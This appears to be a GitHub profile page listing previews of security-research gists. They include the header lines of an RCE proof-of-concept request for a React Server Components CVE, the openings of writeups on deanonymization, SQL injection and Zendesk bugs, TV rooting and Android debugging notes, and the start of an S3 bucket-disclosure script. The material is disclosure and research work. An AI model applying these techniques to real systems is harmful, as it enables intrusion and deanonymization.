Skip to content

Instantly share code, notes, and snippets.

View mantikafasi's full-sized avatar
💭
Creating weird stuff

Manti mantikafasi

💭
Creating weird stuff
88 followers · 34 following
View GitHub Profile
@maple3142
maple3142 / CVE-2025-55182.http
Last active December 7, 2025 03:53
CVE-2025-55182 React Server Components RCE POC
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
@hackermondev
hackermondev / research.md
Last active December 2, 2025 14:11
Unique 0-click deanonymization attack targeting Signal, Discord and hundreds of platform

hi, i'm daniel. i'm a 15-year-old high school junior. in my free time, i hack billion dollar companies and build cool stuff.

3 months ago, I discovered a unique 0-click deanonymization attack that allows an attacker to grab the location of any target within a 250 mile radius. With a vulnerable app installed on a target's phone (or as a background application on their laptop), an attacker can send a malicious payload and deanonymize you within seconds--and you wouldn't even know.

I'm publishing this writeup and research as a warning, especially for journalists, activists, and hackers, about this type of undetectable attack. Hundreds of applications are vulnerable, including some of the most popular apps in the world: Signal, Discord, Twitter/X, and others. Here's how it works:

Cloudflare

By the numbers, Cloudflare is easily the most popular CDN on the market. It beats out competitors such as Sucuri, Amazon CloudFront, Akamai, and Fastly. In 2019, a major Cloudflare outage k

@real2two
real2two / writeup.md
Last active November 18, 2025 03:15
How a SQL injection vulnerability on Discord gave access to first-party Discord activity tokens

Throughout April 6, 2024 to April 8, 2024, I discovered a SQL injection vulnerability shared across multiple first-party Discord activities.

What are Discord activities?

Discord released a feature called "Activites" where you can play games built into Discord.

Behind the scenes, they embed a website (aka the "activity") within Discord to display the game.

How I found the vulnerability

@hackermondev
hackermondev / zendesk.md
Last active November 25, 2025 00:09
1 bug, $50,000+ in bounties, how Zendesk intentionally left a backdoor in hundreds of Fortune 500 companies

hi, i'm daniel. i'm a 15-year-old with some programming experience and i do a little bug hunting in my free time. here's the insane story of how I found a single bug that affected over half of all Fortune 500 companies:

say hello to zendesk

If you've spent some time online, you’ve probably come across Zendesk.

Zendesk is a customer service tool used by some of the world’s top companies. It’s easy to set up: you link it to your company’s support email (like support@company.com), and Zendesk starts managing incoming emails and creating tickets. You can handle these tickets yourself or have a support team do it for you. Zendesk is a billion-dollar company, trusted by big names like Cloudflare.

Personally, I’ve always found it surprising that these massive companies, worth billions, rely on third-party tools like Zendesk instead of building their own in-house ticketing systems.

your weakest link

@0xdevalias
0xdevalias / _deobfuscating-unminifying-obfuscated-web-app-code.md
Last active December 5, 2025 15:16
Some notes and tools for reverse engineering / deobfuscating / unminifying obfuscated web app code
@throwaway96
throwaway96 / crashd.md
Last active November 19, 2025 01:49
crashd instructions

News

EOL (2024-07-21)

I'm not going to be maintaining this document anymore. I'm leaving it as-is since much of the FAQ section is still accurate and has yet to be incorporated into other resources.

Use CanI.RootMy.TV to find an exploit for your TV.

New exploit for webOS 3.5+: DejaVuln (2024-04-21)

@sekkr1
sekkr1 / android_gdb.md
Created August 12, 2019 15:27
Attaching GDB to Android apps' native libraries

How to GDB android native libraries

[1] Install NDK from android studio

[2] Push appropriate gdb-server to phone

adb push ~/android-sdk-linux/ndk-bundle/prebuilt/android-<arch>/gdbserver/gdbserver /data/local/tmp
adb shell "chmod 777 /data/local/tmp/gdbserver"
adb shell "ls -l /data/local/tmp/gdbserver"

[4] Forward ports

adb forward tcp:1337 tcp:1337

@fransr
fransr / bucket-disclose.sh
Last active November 7, 2025 17:35
Using error messages to decloak an S3 bucket. Uses soap, unicode, post, multipart, streaming and index listing as ways of figure it out. You do need a valid aws-key (never the secret) to properly get the error messages
#!/bin/bash
# Written by Frans Rosén (twitter.com/fransrosen)
_debug="$2" #turn on debug
_timeout="20"
#you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key
_aws_key="AKIA..."
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3"
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"